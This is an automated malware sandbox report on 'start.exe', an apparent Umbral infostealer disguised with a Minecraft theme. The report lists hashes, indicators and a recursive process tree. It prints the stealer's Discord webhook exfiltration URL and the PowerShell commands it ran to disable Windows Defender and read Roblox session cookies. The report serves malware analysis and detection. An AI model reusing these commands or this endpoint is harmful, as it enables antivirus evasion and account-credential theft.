Analysis
-
max time kernel
33s -
max time network
281s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
16-03-2024 19:10
Static task
static1
Behavioral task
behavioral1
Sample
minecraft.jar
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
minecraft.jar
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
start.exe
Resource
win7-20240221-en
Errors
General
-
Target
start.exe
-
Size
192KB
-
MD5
066f7f594bf6f254748bc19562dd1bc3
-
SHA1
313883f4a7fbfc3c60b153492aeefb927c5d5694
-
SHA256
9398c6385a5246fe4b86b0f247ddb8a93a9c326389dabef1b96bd65af09b360e
-
SHA512
04f0c82938dee7a790876ab39282c36eda0c6de11a337d93f728c07be6ff5997605c6a9bba886b94091c313795ee19bf96d65ca9ac1e1d62eeab7acd33b6afca
-
SSDEEP
6144:i0mlbUZ0lzEhoPkoaHOw4D/dB8H2HSZRw5:0aCESPkpHNi/bX
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1218605453374914620/OdDYjKWd2x_sgrT_0JmzryiFvoGTz03pvb7F84neOCAte6YtS3TcUiq7-D1K38B9s0T8
Signatures
-
Detect Umbral payload 7 IoCs
resource yara_rule behavioral3/files/0x000b00000001224c-53.dat family_umbral behavioral3/files/0x000b00000001224c-62.dat family_umbral behavioral3/files/0x000b00000001224c-61.dat family_umbral behavioral3/files/0x000b00000001224c-79.dat family_umbral behavioral3/files/0x000b00000001224c-80.dat family_umbral behavioral3/files/0x000b00000001224c-94.dat family_umbral behavioral3/memory/2896-13-0x0000000000360000-0x00000000003A0000-memory.dmp family_umbral -
Blocklisted process makes network request 1 IoCs
flow pid Process 5 2984 NursultanStart.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts NursultanStart.exe -
Executes dropped EXE 64 IoCs
pid Process 2556 NursultanStart.exe 2516 start.exe 2896 NursultanStart.exe 2544 start.exe 2448 NursultanStart.exe 2436 start.exe 2580 NursultanStart.exe 2412 start.exe 3052 NursultanStart.exe 2964 start.exe 2984 NursultanStart.exe 760 start.exe 1524 NursultanStart.exe 568 start.exe 272 NursultanStart.exe 2740 start.exe 2112 NursultanStart.exe 2744 start.exe 1480 NursultanStart.exe 1336 start.exe 2768 NursultanStart.exe 1736 start.exe 1104 NursultanStart.exe 2320 start.exe 2912 NursultanStart.exe 1636 start.exe 1732 NursultanStart.exe 2116 start.exe 1056 NursultanStart.exe 1536 start.exe 1608 NursultanStart.exe 1452 start.exe 932 NursultanStart.exe 2308 start.exe 1540 NursultanStart.exe 2224 start.exe 2892 NursultanStart.exe 1728 start.exe 2096 NursultanStart.exe 2936 start.exe 1596 NursultanStart.exe 1600 start.exe 2520 NursultanStart.exe 2636 start.exe 2688 NursultanStart.exe 1952 start.exe 2464 NursultanStart.exe 2484 start.exe 736 NursultanStart.exe 2808 start.exe 2480 NursultanStart.exe 2888 start.exe 2500 NursultanStart.exe 2640 start.exe 1656 NursultanStart.exe 2820 start.exe 2004 NursultanStart.exe 1832 start.exe 2400 NursultanStart.exe 1996 start.exe 1252 NursultanStart.exe 2324 start.exe 1128 NursultanStart.exe 2296 start.exe -
Loads dropped DLL 64 IoCs
pid Process 3036 start.exe 3036 start.exe 2516 start.exe 2516 start.exe 2544 start.exe 2544 start.exe 2436 start.exe 2436 start.exe 2412 start.exe 2412 start.exe 2964 start.exe 2964 start.exe 760 start.exe 760 start.exe 568 start.exe 568 start.exe 2740 start.exe 2740 start.exe 2744 start.exe 2744 start.exe 1336 start.exe 1336 start.exe 1736 start.exe 1736 start.exe 2320 start.exe 2320 start.exe 1636 start.exe 1636 start.exe 2116 start.exe 2116 start.exe 1536 start.exe 1536 start.exe 1452 start.exe 1452 start.exe 2308 start.exe 2308 start.exe 2224 start.exe 2224 start.exe 1728 start.exe 1728 start.exe 2936 start.exe 2936 start.exe 1600 start.exe 1600 start.exe 2636 start.exe 2636 start.exe 1952 start.exe 1952 start.exe 2484 start.exe 2484 start.exe 2808 start.exe 2808 start.exe 2888 start.exe 2888 start.exe 2640 start.exe 2640 start.exe 2820 start.exe 2820 start.exe 1832 start.exe 1832 start.exe 1996 start.exe 1996 start.exe 2324 start.exe 2324 start.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 22 IoCs
flow ioc 13 discord.com 31 discord.com 37 discord.com 55 discord.com 67 discord.com 54 discord.com 60 discord.com 66 discord.com 6 discord.com 18 discord.com 19 discord.com 42 discord.com 43 discord.com 7 discord.com 30 discord.com 48 discord.com 61 discord.com 12 discord.com 24 discord.com 25 discord.com 36 discord.com 49 discord.com -
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 16 ip-api.com 28 ip-api.com 34 ip-api.com 40 ip-api.com 46 ip-api.com 64 ip-api.com 4 ip-api.com 10 ip-api.com 22 ip-api.com 52 ip-api.com 58 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 11 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2528 Process not Found 2632 Process not Found 1760 Process not Found 2524 Process not Found 1484 Process not Found 2268 Process not Found 2036 Process not Found 2580 Process not Found 2856 Process not Found 1900 wmic.exe 788 Process not Found -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2664 powershell.exe 3016 powershell.exe 2564 powershell.exe 2132 powershell.exe 1696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2984 NursultanStart.exe Token: SeDebugPrivilege 2664 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeDebugPrivilege 2564 powershell.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeIncreaseQuotaPrivilege 1688 wmic.exe Token: SeSecurityPrivilege 1688 wmic.exe Token: SeTakeOwnershipPrivilege 1688 wmic.exe Token: SeLoadDriverPrivilege 1688 wmic.exe Token: SeSystemProfilePrivilege 1688 wmic.exe Token: SeSystemtimePrivilege 1688 wmic.exe Token: SeProfSingleProcessPrivilege 1688 wmic.exe Token: SeIncBasePriorityPrivilege 1688 wmic.exe Token: SeCreatePagefilePrivilege 1688 wmic.exe Token: SeBackupPrivilege 1688 wmic.exe Token: SeRestorePrivilege 1688 wmic.exe Token: SeShutdownPrivilege 1688 wmic.exe Token: SeDebugPrivilege 1688 wmic.exe Token: SeSystemEnvironmentPrivilege 1688 wmic.exe Token: SeRemoteShutdownPrivilege 1688 wmic.exe Token: SeUndockPrivilege 1688 wmic.exe Token: SeManageVolumePrivilege 1688 wmic.exe Token: 33 1688 wmic.exe Token: 34 1688 wmic.exe Token: 35 1688 wmic.exe Token: SeIncreaseQuotaPrivilege 1688 wmic.exe Token: SeSecurityPrivilege 1688 wmic.exe Token: SeTakeOwnershipPrivilege 1688 wmic.exe Token: SeLoadDriverPrivilege 1688 wmic.exe Token: SeSystemProfilePrivilege 1688 wmic.exe Token: SeSystemtimePrivilege 1688 wmic.exe Token: SeProfSingleProcessPrivilege 1688 wmic.exe Token: SeIncBasePriorityPrivilege 1688 wmic.exe Token: SeCreatePagefilePrivilege 1688 wmic.exe Token: SeBackupPrivilege 1688 wmic.exe Token: SeRestorePrivilege 1688 wmic.exe Token: SeShutdownPrivilege 1688 wmic.exe Token: SeDebugPrivilege 1688 wmic.exe Token: SeSystemEnvironmentPrivilege 1688 wmic.exe Token: SeRemoteShutdownPrivilege 1688 wmic.exe Token: SeUndockPrivilege 1688 wmic.exe Token: SeManageVolumePrivilege 1688 wmic.exe Token: 33 1688 wmic.exe Token: 34 1688 wmic.exe Token: 35 1688 wmic.exe Token: SeIncreaseQuotaPrivilege 3032 wmic.exe Token: SeSecurityPrivilege 3032 wmic.exe Token: SeTakeOwnershipPrivilege 3032 wmic.exe Token: SeLoadDriverPrivilege 3032 wmic.exe Token: SeSystemProfilePrivilege 3032 wmic.exe Token: SeSystemtimePrivilege 3032 wmic.exe Token: SeProfSingleProcessPrivilege 3032 wmic.exe Token: SeIncBasePriorityPrivilege 3032 wmic.exe Token: SeCreatePagefilePrivilege 3032 wmic.exe Token: SeBackupPrivilege 3032 wmic.exe Token: SeRestorePrivilege 3032 wmic.exe Token: SeShutdownPrivilege 3032 wmic.exe Token: SeDebugPrivilege 3032 wmic.exe Token: SeSystemEnvironmentPrivilege 3032 wmic.exe Token: SeRemoteShutdownPrivilege 3032 wmic.exe Token: SeUndockPrivilege 3032 wmic.exe Token: SeManageVolumePrivilege 3032 wmic.exe Token: 33 3032 wmic.exe Token: 34 3032 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3036 wrote to memory of 2556 3036 start.exe 255 PID 3036 wrote to memory of 2556 3036 start.exe 255 PID 3036 wrote to memory of 2556 3036 start.exe 255 PID 3036 wrote to memory of 2556 3036 start.exe 255 PID 3036 wrote to memory of 2516 3036 start.exe 29 PID 3036 wrote to memory of 2516 3036 start.exe 29 PID 3036 wrote to memory of 2516 3036 start.exe 29 PID 3036 wrote to memory of 2516 3036 start.exe 29 PID 2516 wrote to memory of 2896 2516 start.exe 30 PID 2516 wrote to memory of 2896 2516 start.exe 30 PID 2516 wrote to memory of 2896 2516 start.exe 30 PID 2516 wrote to memory of 2896 2516 start.exe 30 PID 2516 wrote to memory of 2544 2516 start.exe 376 PID 2516 wrote to memory of 2544 2516 start.exe 376 PID 2516 wrote to memory of 2544 2516 start.exe 376 PID 2516 wrote to memory of 2544 2516 start.exe 376 PID 2544 wrote to memory of 2448 2544 start.exe 380 PID 2544 wrote to memory of 2448 2544 start.exe 380 PID 2544 wrote to memory of 2448 2544 start.exe 380 PID 2544 wrote to memory of 2448 2544 start.exe 380 PID 2544 wrote to memory of 2436 2544 start.exe 401 PID 2544 wrote to memory of 2436 2544 start.exe 401 PID 2544 wrote to memory of 2436 2544 start.exe 401 PID 2544 wrote to memory of 2436 2544 start.exe 401 PID 2436 wrote to memory of 2580 2436 start.exe 34 PID 2436 wrote to memory of 2580 2436 start.exe 34 PID 2436 wrote to memory of 2580 2436 start.exe 34 PID 2436 wrote to memory of 2580 2436 start.exe 34 PID 2436 wrote to memory of 2412 2436 start.exe 337 PID 2436 wrote to memory of 2412 2436 start.exe 337 PID 2436 wrote to memory of 2412 2436 start.exe 337 PID 2436 wrote to memory of 2412 2436 start.exe 337 PID 2412 wrote to memory of 3052 2412 start.exe 36 PID 2412 wrote to memory of 3052 2412 start.exe 36 PID 2412 wrote to memory of 3052 2412 start.exe 36 PID 2412 wrote to memory of 3052 2412 start.exe 36 PID 2412 wrote to memory of 2964 2412 start.exe 431 PID 2412 wrote to memory of 2964 2412 start.exe 431 PID 2412 wrote to memory of 2964 2412 start.exe 431 PID 2412 wrote to memory of 2964 2412 start.exe 431 PID 2964 wrote to memory of 2984 2964 start.exe 553 PID 2964 wrote to memory of 2984 2964 start.exe 553 PID 2964 wrote to memory of 2984 2964 start.exe 553 PID 2964 wrote to memory of 2984 2964 start.exe 553 PID 2964 wrote to memory of 760 2964 start.exe 39 PID 2964 wrote to memory of 760 2964 start.exe 39 PID 2964 wrote to memory of 760 2964 start.exe 39 PID 2964 wrote to memory of 760 2964 start.exe 39 PID 760 wrote to memory of 1524 760 start.exe 197 PID 760 wrote to memory of 1524 760 start.exe 197 PID 760 wrote to memory of 1524 760 start.exe 197 PID 760 wrote to memory of 1524 760 start.exe 197 PID 760 wrote to memory of 568 760 start.exe 442 PID 760 wrote to memory of 568 760 start.exe 442 PID 760 wrote to memory of 568 760 start.exe 442 PID 760 wrote to memory of 568 760 start.exe 442 PID 568 wrote to memory of 272 568 start.exe 631 PID 568 wrote to memory of 272 568 start.exe 631 PID 568 wrote to memory of 272 568 start.exe 631 PID 568 wrote to memory of 272 568 start.exe 631 PID 568 wrote to memory of 2740 568 start.exe 638 PID 568 wrote to memory of 2740 568 start.exe 638 PID 568 wrote to memory of 2740 568 start.exe 638 PID 568 wrote to memory of 2740 568 start.exe 638
Processes
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"2⤵
- Executes dropped EXE
PID:2556
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"3⤵
- Executes dropped EXE
PID:2896
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2544 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"4⤵
- Executes dropped EXE
PID:2448
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2436 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"5⤵
- Executes dropped EXE
PID:2580
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"6⤵
- Executes dropped EXE
PID:3052
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"7⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe'8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2664
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 28⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1688
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3032
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid8⤵PID:1284
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER8⤵
- Suspicious behavior: EnumeratesProcesses
PID:1696
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name8⤵
- Detects videocard installed
PID:1900
-
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:760 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"8⤵
- Executes dropped EXE
PID:1524
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:568 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"9⤵
- Executes dropped EXE
PID:272
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2740 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"10⤵
- Executes dropped EXE
PID:2112
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2744 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"11⤵
- Executes dropped EXE
PID:1480
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"12⤵
- Executes dropped EXE
PID:2768
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"12⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1736 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"13⤵
- Executes dropped EXE
PID:1104
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"13⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"14⤵
- Executes dropped EXE
PID:2912
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"14⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1636 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"15⤵
- Executes dropped EXE
PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"15⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2116 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"16⤵
- Executes dropped EXE
PID:1056
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"16⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1536 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"17⤵
- Executes dropped EXE
PID:1608
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"17⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1452 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"18⤵
- Executes dropped EXE
PID:932
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"18⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2308 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"19⤵
- Executes dropped EXE
PID:1540
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"19⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2224 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"20⤵
- Executes dropped EXE
PID:2892
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"20⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1728 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"21⤵
- Executes dropped EXE
PID:2096
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"21⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2936 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"22⤵
- Executes dropped EXE
PID:1596
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"22⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"23⤵
- Executes dropped EXE
PID:2520
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"23⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2636 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"24⤵
- Executes dropped EXE
PID:2688
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1952 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"25⤵
- Executes dropped EXE
PID:2464
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"25⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2484 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"26⤵
- Executes dropped EXE
PID:736
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"26⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2808 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"27⤵
- Executes dropped EXE
PID:2480
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"27⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2888 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"28⤵
- Executes dropped EXE
PID:2500
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"28⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2640 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"29⤵
- Executes dropped EXE
PID:1656
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"29⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"30⤵
- Executes dropped EXE
PID:2004
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"30⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1832 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"31⤵
- Executes dropped EXE
PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"31⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"32⤵
- Executes dropped EXE
PID:1252
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"32⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2324 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"33⤵
- Executes dropped EXE
PID:1128
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"33⤵
- Executes dropped EXE
PID:2296 -
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"34⤵PID:2312
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"34⤵PID:2244
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"35⤵PID:1756
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"35⤵PID:1636
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"36⤵PID:2772
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"36⤵PID:1980
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"37⤵PID:2060
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"37⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"38⤵PID:1056
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"38⤵PID:968
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"39⤵PID:1776
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"39⤵PID:1692
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"40⤵PID:1124
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"40⤵PID:888
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"41⤵PID:1060
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"41⤵PID:2308
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"42⤵PID:552
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"42⤵PID:3000
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"43⤵PID:2016
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"43⤵PID:1936
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"44⤵PID:2352
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"44⤵PID:2068
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"45⤵PID:2928
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"45⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"C:\Users\Admin\AppData\Local\Temp\NursultanStart.exe"46⤵PID:2600
-
-
C:\Users\Admin\AppData\Local\Temp\start.exe"C:\Users\Admin\AppData\Local\Temp\start.exe"46⤵PID:1572
-
